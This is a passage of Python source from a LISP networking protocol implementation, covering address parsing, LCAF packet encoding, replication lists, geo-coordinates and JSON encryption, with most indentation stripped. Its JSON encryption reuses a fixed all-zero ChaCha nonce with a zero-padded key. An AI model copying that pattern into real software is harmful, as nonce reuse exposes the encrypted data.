# and then below byte-swap the first 2-bytes.
#
odd_byte = (addr_str[2:4] == "::")
try:
addr_str = socket.inet_pton(socket.AF_INET6, addr_str)
except:
addr_str = socket.inet_pton(socket.AF_INET6, "0::0")
#endtry
addr_str = binascii.hexlify(addr_str)
if (odd_byte):
addr_str = addr_str[2:4] + addr_str[0:2] + addr_str[4::]
#endif
self.address = int(addr_str, 16)
elif (self.is_geo_prefix()):
geo = lisp_geo(None)
geo.name = "geo-prefix-{}".format(geo)
geo.parse_geo_string(addr_str)
self.address = geo
elif (self.is_mac()):
addr_str = addr_str.replace("-", "")
value = int(addr_str, 16)
self.address = value
elif (self.is_e164()):
addr_str = addr_str[1::]
value = int(addr_str, 16)
self.address = value << 4
elif (self.is_dist_name()):
self.address = addr_str.replace("'", "")
#endif
self.mask_len = self.host_mask_len()
#enddef
def store_prefix(self, prefix_str):
if (self.is_geo_string(prefix_str)):
index = prefix_str.find("]")
mask_len = len(prefix_str[index+1::]) * 8
elif (prefix_str.find("/") != -1):
prefix_str, mask_len = prefix_str.split("/")
else:
left = prefix_str.find("'")
if (left == -1): return
right = prefix_str.find("'", left+1)
if (right == -1): return
mask_len = len(prefix_str[left+1:right]) * 8
#endif
self.string_to_afi(prefix_str)
self.store_address(prefix_str)
self.mask_len = int(mask_len)
#enddef
def zero_host_bits(self):
if (self.mask_len < 0): return
mask = (2 ** self.mask_len) - 1
shift = self.addr_length() * 8 - self.mask_len
mask <<= shift
self.address &= mask
#enddef
def is_geo_string(self, addr_str):
index = addr_str.find("]")
if (index != -1): addr_str = addr_str[index+1::]
geo = addr_str.split("/")
if (len(geo) == 2):
if (geo[1].isdigit() == False): return(False)
#endif
geo = geo[0]
geo = geo.split("-")
geo_len = len(geo)
if (geo_len < 8 or geo_len > 9): return(False)
for num in range(0, geo_len):
if (num == 3):
if (geo[num] in ["N", "S"]): continue
return(False)
#endif
if (num == 7):
if (geo[num] in ["W", "E"]): continue
return(False)
#endif
if (geo[num].isdigit() == False): return(False)
#endfor
return(True)
#enddef
def string_to_afi(self, addr_str):
if (addr_str.count("'") == 2):
self.afi = LISP_AFI_NAME
return
#endif
if (addr_str.find(":") != -1): self.afi = LISP_AFI_IPV6
elif (addr_str.find(".") != -1): self.afi = LISP_AFI_IPV4
elif (addr_str.find("+") != -1): self.afi = LISP_AFI_E164
elif (self.is_geo_string(addr_str)): self.afi = LISP_AFI_GEO_COORD
elif (addr_str.find("-") != -1): self.afi = LISP_AFI_MAC
else: self.afi = LISP_AFI_NONE
#enddef
def print_address(self):
addr = self.print_address_no_iid()
iid = "[" + str(self.instance_id)
for i in self.iid_list: iid += "," + str(i)
iid += "]"
addr = "{}{}".format(iid, addr)
return(addr)
#enddef
def print_address_no_iid(self):
if (self.is_ipv4()):
addr = self.address
value1 = addr >> 24
value2 = (addr >> 16) & 0xff
value3 = (addr >> 8) & 0xff
value4 = addr & 0xff
return("{}.{}.{}.{}".format(value1, value2, value3, value4))
elif (self.is_ipv6()):
addr_str = lisp_hex_string(self.address).zfill(32)
addr_str = binascii.unhexlify(addr_str)
addr_str = socket.inet_ntop(socket.AF_INET6, addr_str)
return("{}".format(addr_str))
elif (self.is_geo_prefix()):
return("{}".format(self.address.print_geo()))
elif (self.is_mac()):
addr_str = lisp_hex_string(self.address).zfill(12)
addr_str = "{}-{}-{}".format(addr_str[0:4], addr_str[4:8],
addr_str[8:12])
return("{}".format(addr_str))
elif (self.is_e164()):
addr_str = lisp_hex_string(self.address).zfill(15)
return("+{}".format(addr_str))
elif (self.is_dist_name()):
return("'{}'".format(self.address))
elif (self.is_null()):
return("no-address")
#endif
return("unknown-afi:{}".format(self.afi))
#enddef
def print_prefix(self):
if (self.is_ultimate_root()): return("[*]")
if (self.is_iid_range()):
if (self.mask_len == 32): return("[{}]".format(self.instance_id))
upper = self.instance_id + (2**(32 - self.mask_len) - 1)
return("[{}-{}]".format(self.instance_id, upper))
#endif
addr = self.print_address()
if (self.is_dist_name()): return(addr)
if (self.is_geo_prefix()): return(addr)
index = addr.find("no-address")
if (index == -1):
addr = "{}/{}".format(addr, str(self.mask_len))
else:
addr = addr[0:index]
#endif
return(addr)
#enddef
def print_prefix_no_iid(self):
addr = self.print_address_no_iid()
if (self.is_dist_name()): return(addr)
if (self.is_geo_prefix()): return(addr)
return("{}/{}".format(addr, str(self.mask_len)))
#enddef
def print_prefix_url(self):
if (self.is_ultimate_root()): return("0--0")
addr = self.print_address()
index = addr.find("]")
if (index != -1): addr = addr[index+1::]
if (self.is_geo_prefix()):
addr = addr.replace("/", "-")
return("{}-{}".format(self.instance_id, addr))
#endif
return("{}-{}-{}".format(self.instance_id, addr, self.mask_len))
#enddef
def print_sg(self, g):
s = self.print_prefix()
si = s.find("]") + 1
g = g.print_prefix()
gi = g.find("]") + 1
sg_str = "[{}]({}, {})".format(self.instance_id, s[si::], g[gi::])
return(sg_str)
#enddef
def hash_address(self, addr):
addr1 = self.address
addr2 = addr.address
if (self.is_geo_prefix()): addr1 = self.address.print_geo()
if (addr.is_geo_prefix()): addr2 = addr.address.print_geo()
if (type(addr1) == str):
addr1 = int(binascii.hexlify(addr1[0:1]), 16)
#endif
if (type(addr2) == str):
addr2 = int(binascii.hexlify(addr2[0:1]), 16)
#endif
return(addr1 ^ addr2)
#enddef
#
# Is self more specific or equal to the prefix supplied in variable
# 'prefix'. Return True if so.
#
def is_more_specific(self, prefix):
if (prefix.afi == LISP_AFI_ULTIMATE_ROOT): return(True)
mask_len = prefix.mask_len
if (prefix.afi == LISP_AFI_IID_RANGE):
size = 2**(32 - mask_len)
lower = prefix.instance_id
upper = lower + size
return(lower <= self.instance_id < upper)
#endif
if (self.instance_id != prefix.instance_id): return(False)
if (self.afi != prefix.afi):
if (prefix.afi != LISP_AFI_NONE): return(False)
#endif
#
# Handle string addresses like distinguished names and geo-prefixes.
#
if (self.is_binary() == False):
if (prefix.afi == LISP_AFI_NONE): return(True)
if (type(self.address) != type(prefix.address)): return(False)
addr = self.address
paddr = prefix.address
if (self.is_geo_prefix()):
addr = self.address.print_geo()
paddr = prefix.address.print_geo()
#endif
if (len(addr) < len(paddr)): return(False)
return(addr.find(paddr) == 0)
#endif
#
# Handle numeric addresses.
#
if (self.mask_len < mask_len): return(False)
shift = (prefix.addr_length() * 8) - mask_len
mask = (2**mask_len - 1) << shift
return((self.address & mask) == prefix.address)
#enddef
def mask_address(self, mask_len):
shift = (self.addr_length() * 8) - mask_len
mask = (2**mask_len - 1) << shift
self.address &= mask
#enddef
def is_exact_match(self, prefix):
if (self.instance_id != prefix.instance_id): return(False)
p1 = self.print_prefix()
p2 = prefix.print_prefix() if prefix else ""
return(p1 == p2)
#enddef
def is_local(self):
if (self.is_ipv4()):
local = lisp_myrlocs[0]
if (local == None): return(False)
local = local.print_address_no_iid()
return(self.print_address_no_iid() == local)
#endif
if (self.is_ipv6()):
local = lisp_myrlocs[1]
if (local == None): return(False)
local = local.print_address_no_iid()
return(self.print_address_no_iid() == local)
#endif
return(False)
#enddef
def store_iid_range(self, iid, mask_len):
if (self.afi == LISP_AFI_NONE):
if (iid == 0 and mask_len == 0): self.afi = LISP_AFI_ULTIMATE_ROOT
else: self.afi = LISP_AFI_IID_RANGE
#endif
self.instance_id = iid
self.mask_len = mask_len
#enddef
def lcaf_length(self, lcaf_type):
length = self.addr_length() + 2
if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE): length += 4
if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE): length += 4
if (lcaf_type == LISP_LCAF_ASN_TYPE): length += 4
if (lcaf_type == LISP_LCAF_APP_DATA_TYPE): length += 8
if (lcaf_type == LISP_LCAF_GEO_COORD_TYPE): length += 12
if (lcaf_type == LISP_LCAF_OPAQUE_TYPE): length += 0
if (lcaf_type == LISP_LCAF_NAT_TYPE): length += 4
if (lcaf_type == LISP_LCAF_NONCE_LOC_TYPE): length += 4
if (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE): length = length * 2 + 8
if (lcaf_type == LISP_LCAF_ELP_TYPE): length += 0
if (lcaf_type == LISP_LCAF_SECURITY_TYPE): length += 6
if (lcaf_type == LISP_LCAF_SOURCE_DEST_TYPE): length += 4
if (lcaf_type == LISP_LCAF_RLE_TYPE): length += 4
return(length)
#enddef
#
# Instance ID LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 2 | IID mask-len | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lcaf_encode_iid(self):
lcaf_type = LISP_LCAF_INSTANCE_ID_TYPE
addr_length = socket.htons(self.lcaf_length(lcaf_type))
iid = self.instance_id
afi = self.afi
ml = 0
if (afi < 0):
if (self.afi == LISP_AFI_GEO_COORD):
afi = LISP_AFI_LCAF
ml = 0
else:
afi = 0
ml = self.mask_len
#endif
#endif
lcaf = struct.pack("BBBBH", 0, 0, lcaf_type, ml, addr_length)
lcaf += struct.pack("IH", socket.htonl(iid), socket.htons(afi))
if (afi == 0): return(lcaf)
if (self.afi == LISP_AFI_GEO_COORD):
lcaf = lcaf[0:-2]
lcaf += self.address.encode_geo()
return(lcaf)
#endif
lcaf += self.pack_address()
return(lcaf)
#enddef
def lcaf_decode_iid(self, packet):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
x, y, lcaf_type, iid_ml, length = struct.unpack(packet_format,
packet[:format_size])
packet = packet[format_size::]
if (lcaf_type != LISP_LCAF_INSTANCE_ID_TYPE): return(None)
packet_format = "IH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
iid, afi = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
length = socket.ntohs(length)
self.instance_id = socket.ntohl(iid)
afi = socket.ntohs(afi)
self.afi = afi
if (iid_ml != 0 and afi == 0): self.mask_len = iid_ml
if (afi == 0):
self.afi = LISP_AFI_IID_RANGE if iid_ml else LISP_AFI_ULTIMATE_ROOT
#endif
#
# No address encoded.
#
if (afi == 0): return(packet)
#
# Look for distinguished-name.
#
if (self.is_dist_name()):
packet, self.address = lisp_decode_dist_name(packet)
self.mask_len = len(self.address) * 8
return(packet)
#endif
#
# Only process geo-prefixes inside of an LCAF encoded Instance-ID type.
#
if (afi == LISP_AFI_LCAF):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
geo = lisp_geo("")
self.afi = LISP_AFI_GEO_COORD
self.address = geo
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
self.mask_len = self.host_mask_len()
return(packet)
#endif
addr_length = self.addr_length()
if (len(packet) < addr_length): return(None)
packet = self.unpack_address(packet)
return(packet)
#enddef
#
# Multicast Info Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 9 | Rsvd2 |R|L|J| 8 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance-ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | Source MaskLen| Group MaskLen |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Source/Subnet Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Group Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lcaf_encode_sg(self, group):
lcaf_type = LISP_LCAF_MCAST_INFO_TYPE
iid = socket.htonl(self.instance_id)
addr_length = socket.htons(self.lcaf_length(lcaf_type))
lcaf = struct.pack("BBBBHIHBB", 0, 0, lcaf_type, 0, addr_length, iid,
0, self.mask_len, group.mask_len)
lcaf += struct.pack("H", socket.htons(self.afi))
lcaf += self.pack_address()
lcaf += struct.pack("H", socket.htons(group.afi))
lcaf += group.pack_address()
return(lcaf)
#enddef
def lcaf_decode_sg(self, packet):
packet_format = "BBBBHIHBB"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
x, y, lcaf_type, rsvd, length, iid, z, sml, gml = \
struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
if (lcaf_type != LISP_LCAF_MCAST_INFO_TYPE): return([None, None])
self.instance_id = socket.ntohl(iid)
length = socket.ntohs(length) - 8
#
# Get AFI and source address. Validate if enough length and there
# are bytes in the packet.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
if (length < format_size): return([None, None])
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
length -= format_size
self.afi = socket.ntohs(afi)
self.mask_len = sml
addr_length = self.addr_length()
if (length < addr_length): return([None, None])
packet = self.unpack_address(packet)
if (packet == None): return([None, None])
length -= addr_length
#
# Get AFI and group address. Validate if enough length and there
# are bytes in the packet.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
if (length < format_size): return([None, None])
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
length -= format_size
group = lisp_address(LISP_AFI_NONE, "", 0, 0)
group.afi = socket.ntohs(afi)
group.mask_len = gml
group.instance_id = self.instance_id
addr_length = group.addr_length()
if (length < addr_length): return([None, None])
packet = group.unpack_address(packet)
if (packet == None): return([None, None])
return([packet, group])
#enddef
def lcaf_decode_eid(self, packet):
packet_format = "BBB"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
#
# Do not advance packet pointer. The specific LCAF decoders will do
# it themselves.
#
rsvd, flags, lcaf_type = struct.unpack(packet_format,
packet[:format_size])
if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE):
return([self.lcaf_decode_iid(packet), None])
elif (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE):
packet, group = self.lcaf_decode_sg(packet)
return([packet, group])
elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return([None, None])
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return([None, None])
geo = lisp_geo("")
self.instance_id = 0
self.afi = LISP_AFI_GEO_COORD
self.address = geo
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
self.mask_len = self.host_mask_len()
#endif
return([packet, None])
#enddef
#endclass
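#
# Illustrative sketch, not referenced by the rest of this file: round-trips
# an EID through the Instance-ID LCAF encoder/decoder documented above. Note
# that lcaf_encode_iid() does not carry the mask-length for a regular AFI
# (the mask-length field is only used for instance-ID ranges), so only the
# instance-ID and address survive the round-trip here.
#
def _example_lcaf_iid_roundtrip():
    eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
    eid.store_prefix("[2000]192.168.1.0/24")
    lcaf = eid.lcaf_encode_iid()
    decoded = lisp_address(LISP_AFI_NONE, "", 0, 0)
    decoded.lcaf_decode_iid(lcaf)
    return(decoded.print_address())
#enddef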
#
# Data structure for storing learned or configured ELPs.
#
class lisp_elp_node():
def __init__(self):
self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.probe = False
self.strict = False
self.eid = False
self.we_are_last = False
#enddef
def copy_elp_node(self):
elp_node = lisp_elp_node()
elp_node.copy_address(self.address)
elp_node.probe = self.probe
elp_node.strict = self.strict
elp_node.eid = self.eid
elp_node.we_are_last = self.we_are_last
return(elp_node)
#enddef
#endclass
class lisp_elp():
def __init__(self, name):
self.elp_name = name
self.elp_nodes = []
self.use_elp_node = None
self.we_are_last = False
#enddef
def copy_elp(self):
elp = lisp_elp(self.elp_name)
elp.use_elp_node = self.use_elp_node
elp.we_are_last = self.we_are_last
for elp_node in self.elp_nodes:
elp.elp_nodes.append(elp_node.copy_elp_node())
#endfor
return(elp)
#enddef
def print_elp(self, want_marker):
elp_str = ""
for elp_node in self.elp_nodes:
use_or_last = ""
if (want_marker):
if (elp_node == self.use_elp_node):
use_or_last = "*"
elif (elp_node.we_are_last):
use_or_last = "x"
#endif
#endif
elp_str += "{}{}({}{}{}), ".format(use_or_last,
elp_node.address.print_address_no_iid(),
"r" if elp_node.eid else "R", "P" if elp_node.probe else "p",
"S" if elp_node.strict else "s")
#endfor
return(elp_str[0:-2] if elp_str != "" else "")
#enddef
def select_elp_node(self):
v4, v6, device = lisp_myrlocs
index = None
for elp_node in self.elp_nodes:
if (v4 and elp_node.address.is_exact_match(v4)):
index = self.elp_nodes.index(elp_node)
break
#endif
if (v6 and elp_node.address.is_exact_match(v6)):
index = self.elp_nodes.index(elp_node)
break
#endif
#endfor
#
# If we did not find a match, this is possibly an ITR. We need to give
# it the first ELP node.
#
if (index == None):
self.use_elp_node = self.elp_nodes[0]
elp_node.we_are_last = False
return
#endif
#
# If we matched the last item in the ELP nodes, we are the end of the
# path. Flag it for display purposes and return None.
#
if (self.elp_nodes[-1] == self.elp_nodes[index]):
self.use_elp_node = None
elp_node.we_are_last = True
return
#endif
#
# Return the next node after the one that matches this system.
#
self.use_elp_node = self.elp_nodes[index+1]
return
#enddef
#endclass
class lisp_geo():
def __init__(self, name):
self.geo_name = name
self.latitude = 0xffffffff # Negative when North, otherwise South
self.lat_mins = 0
self.lat_secs = 0
self.longitude = 0xffffffff # Negative when East, otherwise West
self.long_mins = 0
self.long_secs = 0
self.altitude = -1
self.radius = 0
#enddef
def copy_geo(self):
geo = lisp_geo(self.geo_name)
geo.latitude = self.latitude
geo.lat_mins = self.lat_mins
geo.lat_secs = self.lat_secs
geo.longitude = self.longitude
geo.long_mins = self.long_mins
geo.long_secs = self.long_secs
geo.altitude = self.altitude
geo.radius = self.radius
return(geo)
#enddef
def no_geo_altitude(self):
return(self.altitude == -1)
#enddef
def parse_geo_string(self, geo_str):
index = geo_str.find("]")
if (index != -1): geo_str = geo_str[index+1::]
#
# Check if radius is specified. That is a geo-prefix and not just a
# geo-point.
#
if (geo_str.find("/") != -1):
geo_str, radius = geo_str.split("/")
self.radius = int(radius)
#endif
geo_str = geo_str.split("-")
if (len(geo_str) < 8): return(False)
latitude = geo_str[0:4]
longitude = geo_str[4:8]
#
# Get optional altitude.
#
if (len(geo_str) > 8): self.altitude = int(geo_str[8])
#
# Get latitude values.
#
self.latitude = int(latitude[0])
self.lat_mins = int(latitude[1])
self.lat_secs = int(latitude[2])
if (latitude[3] == "N"): self.latitude = -self.latitude
#
# Get longitude values.
#
self.longitude = int(longitude[0])
self.long_mins = int(longitude[1])
self.long_secs = int(longitude[2])
if (longitude[3] == "E"): self.longitude = -self.longitude
return(True)
#enddef
def print_geo(self):
n_or_s = "N" if self.latitude < 0 else "S"
e_or_w = "E" if self.longitude < 0 else "W"
geo_str = "{}-{}-{}-{}-{}-{}-{}-{}".format(abs(self.latitude),
self.lat_mins, self.lat_secs, n_or_s, abs(self.longitude),
self.long_mins, self.long_secs, e_or_w)
if (self.no_geo_altitude() == False):
geo_str += "-" + str(self.altitude)
#endif
#
# Print "/<radius>" if not 0.
#
if (self.radius != 0): geo_str += "/{}".format(self.radius)
return(geo_str)
#enddef
def geo_url(self):
zoom = os.getenv("LISP_GEO_ZOOM_LEVEL")
zoom = "10" if (zoom == None or zoom.isdigit() == False) else zoom
lat, lon = self.dms_to_decimal()
url = ("http://maps.googleapis.com/maps/api/staticmap?center={},{}" + \
"&markers=color:blue%7Clabel:lisp%7C{},{}" + \
"&zoom={}&size=1024x1024&sensor=false").format(lat, lon, lat, lon,
zoom)
return(url)
#enddef
def print_geo_url(self):
geo = self.print_geo()
if (self.radius == 0):
url = self.geo_url()
string = "<a href='{}'>{}</a>".format(url, geo)
else:
url = geo.replace("/", "-")
string = "<a href='/lisp/geo-map/{}'>{}</a>".format(url, geo)
#endif
return(string)
#enddef
def dms_to_decimal(self):
degs, mins, secs = self.latitude, self.lat_mins, self.lat_secs
dd = float(abs(degs))
dd += float(mins * 60 + secs) / 3600
if (degs > 0): dd = -dd
dd_lat = dd
degs, mins, secs = self.longitude, self.long_mins, self.long_secs
dd = float(abs(degs))
dd += float(mins * 60 + secs) / 3600
if (degs > 0): dd = -dd
dd_long = dd
return((dd_lat, dd_long))
#enddef
def get_distance(self, geo_point):
dd_prefix = self.dms_to_decimal()
dd_point = geo_point.dms_to_decimal()
distance = vincenty(dd_prefix, dd_point)
return(distance.km)
#enddef
def point_in_circle(self, geo_point):
km = self.get_distance(geo_point)
return(km <= self.radius)
#enddef
def encode_geo(self):
lcaf_afi = socket.htons(LISP_AFI_LCAF)
geo_len = socket.htons(20 + 2)
flags = 0
lat = abs(self.latitude)
lat_ms = ((self.lat_mins * 60) + self.lat_secs) * 1000
if (self.latitude < 0): flags |= 0x40
lon = abs(self.longitude)
lon_ms = ((self.long_mins * 60) + self.long_secs) * 1000
if (self.longitude < 0): flags |= 0x20
alt = 0
if (self.no_geo_altitude() == False):
alt = socket.htonl(self.altitude)
flags |= 0x10
#endif
radius = socket.htons(self.radius)
if (radius != 0): flags |= 0x06
pkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_GEO_COORD_TYPE,
0, geo_len)
pkt += struct.pack("BBHBBHBBHIHHH", flags, 0, 0, lat, lat_ms >> 16,
socket.htons(lat_ms & 0x0ffff), lon, lon_ms >> 16,
socket.htons(lon_ms & 0xffff), alt, radius, 0, 0)
return(pkt)
#enddef
def decode_geo(self, packet, lcaf_len, radius_hi):
packet_format = "BBHBBHBBHIHHH"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
flags, r1, uncertainty, lat, lat_hi, lat_ms, lon, lon_hi, lon_ms, \
alt, radius, r2, afi = struct.unpack(packet_format,
packet[:format_size])
#
# No nested LCAFs in Geo-Coord type.
#
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
if (flags & 0x40): lat = -lat
self.latitude = lat
lat_secs = ((lat_hi << 16) | socket.ntohs(lat_ms)) / 1000
self.lat_mins = lat_secs / 60
self.lat_secs = lat_secs % 60
if (flags & 0x20): lon = -lon
self.longitude = lon
lon_secs = ((lon_hi << 16) | socket.ntohs(lon_ms)) / 1000
self.long_mins = lon_secs / 60
self.long_secs = lon_secs % 60
self.altitude = socket.ntohl(alt) if (flags & 0x10) else -1
radius = socket.ntohs(radius)
self.radius = radius if (flags & 0x02) else radius * 1000
self.geo_name = None
packet = packet[format_size::]
if (afi != 0):
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
self.rloc.mask_len = self.rloc.host_mask_len()
#endif
return(packet)
#enddef
#endclass
#
# Structure for Replication List Entries.
#
class lisp_rle_node():
def __init__(self):
self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.level = 0
self.translated_port = 0
self.rloc_name = None
#enddef
def copy_rle_node(self):
rle_node = lisp_rle_node()
rle_node.address.copy_address(self.address)
rle_node.level = self.level
rle_node.translated_port = self.translated_port
rle_node.rloc_name = self.rloc_name
return(rle_node)
#enddef
def store_translated_rloc(self, rloc, port):
self.address.copy_address(rloc)
self.translated_port = port
#enddef
def get_encap_keys(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.address.print_address_no_iid() + ":" + port
try:
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
return(None, None)
except:
return(None, None)
#endtry
#enddef
#endclass
class lisp_rle():
def __init__(self, name):
self.rle_name = name
self.rle_nodes = []
self.rle_forwarding_list = []
#enddef
def copy_rle(self):
rle = lisp_rle(self.rle_name)
for rle_node in self.rle_nodes:
rle.rle_nodes.append(rle_node.copy_rle_node())
#endfor
rle.build_forwarding_list()
return(rle)
#enddef
def print_rle(self, html, do_formatting):
rle_str = ""
for rle_node in self.rle_nodes:
port = rle_node.translated_port
rle_name_str = ""
if (rle_node.rloc_name != None):
rle_name_str = rle_node.rloc_name
if (do_formatting): rle_name_str = blue(rle_name_str, html)
rle_name_str = "({})".format(rle_name_str)
#endif
addr_str = rle_node.address.print_address_no_iid()
if (rle_node.address.is_local()): addr_str = red(addr_str, html)
rle_str += "{}{}{}, ".format(addr_str, "" if port == 0 else \
":" + str(port), rle_name_str)
#endfor
return(rle_str[0:-2] if rle_str != "" else "")
#enddef
def build_forwarding_list(self):
level = -1
for rle_node in self.rle_nodes:
if (level == -1):
if (rle_node.address.is_local()): level = rle_node.level
else:
if (rle_node.level > level): break
#endif
#endfor
level = 0 if level == -1 else rle_node.level
self.rle_forwarding_list = []
for rle_node in self.rle_nodes:
if (rle_node.level == level or (level == 0 and
rle_node.level == 128)):
if (lisp_i_am_rtr == False and rle_node.address.is_local()):
addr_str = rle_node.address.print_address_no_iid()
lprint("Exclude local RLE RLOC {}".format(addr_str))
continue
#endif
self.rle_forwarding_list.append(rle_node)
#endif
#endfor
#enddef
#endclass
class lisp_json():
def __init__(self, name, string, encrypted=False, ms_encrypt=False):
self.json_name = name
self.json_string = string
self.json_encrypted = False
#
# Decide to encrypt or decrypt. The map-server encrypts and stores
# ciphertext in mapping system. The lig client decrypts to show user
# data if it has the key in env variable LISP_JSON_KEY. Format of
# env variable is "<key>" or "[<key-id>]<key>".
#
# If the LISP site-eid is not configured to encrypt the JSON, then
# store it in plaintext.
#
if (len(lisp_ms_json_keys) != 0):
if (ms_encrypt == False): return
self.json_key_id = lisp_ms_json_keys.keys()[0]
self.json_key = lisp_ms_json_keys[self.json_key_id]
self.encrypt_json()
#endif
if (lisp_log_id == "lig" and encrypted):
key = os.getenv("LISP_JSON_KEY")
if (key != None):
index = -1
if (key[0] == "[" and "]" in key):
index = key.find("]")
self.json_key_id = int(key[1:index])
#endif
self.json_key = key[index+1::]
#endif
self.decrypt_json()
#endif
#endif
#enddef
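#
# Illustrative sketch (values are hypothetical): if the lig client has
#
#   LISP_JSON_KEY = "[3]my-secret"
#
# the parsing above yields json_key_id 3 and json_key "my-secret".
# Without a bracketed key-id, e.g. LISP_JSON_KEY = "my-secret", index
# stays -1 and the entire string is used as the key.
#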
def add(self):
self.delete()
lisp_json_list[self.json_name] = self
#enddef
def delete(self):
if (lisp_json_list.has_key(self.json_name)):
del(lisp_json_list[self.json_name])
lisp_json_list[self.json_name] = None
#endif
#enddef
def print_json(self, html):
good_string = self.json_string
bad = "***"
if (html): bad = red(bad, html)
bad_string = bad + self.json_string + bad
if (self.valid_json()): return(good_string)
return(bad_string)
#enddef
def valid_json(self):
try:
json.loads(self.json_string)
except:
return(False)
#endtry
return(True)
#enddef
def encrypt_json(self):
ekey = self.json_key.zfill(32)
iv = "0" * 8
jd = json.loads(self.json_string)
for key in jd:
value = jd[key]
value = chacha.ChaCha(ekey, iv).encrypt(value)
jd[key] = binascii.hexlify(value)
#endfor
self.json_string = json.dumps(jd)
self.json_encrypted = True
#enddef
def decrypt_json(self):
ekey = self.json_key.zfill(32)
iv = "0" * 8
jd = json.loads(self.json_string)
for key in jd:
value = binascii.unhexlify(jd[key])
jd[key] = chacha.ChaCha(ekey, iv).encrypt(value)
#endfor
try:
self.json_string = json.dumps(jd)
self.json_encrypted = False
except:
pass
#endtry
#enddef
#endclass
#
# LISP forwarding stats info.
#
class lisp_stats():
def __init__(self):
self.packet_count = 0
self.byte_count = 0
self.last_rate_check = 0
self.last_packet_count = 0
self.last_byte_count = 0
self.last_increment = None
#enddef
def increment(self, octets):
self.packet_count += 1
self.byte_count += octets
self.last_increment = lisp_get_timestamp()
#enddef
def recent_packet_sec(self):
if (self.last_increment == None): return(False)
elapsed = time.time() - self.last_increment
return(elapsed <= 1)
#enddef
def recent_packet_min(self):
if (self.last_increment == None): return(False)
elapsed = time.time() - self.last_increment
return(elapsed <= 60)
#enddef
def stat_colors(self, c1, c2, html):
if (self.recent_packet_sec()):
return(green_last_sec(c1), green_last_sec(c2))
#endif
if (self.recent_packet_min()):
return(green_last_min(c1), green_last_min(c2))
#endif
return(c1, c2)
#enddef
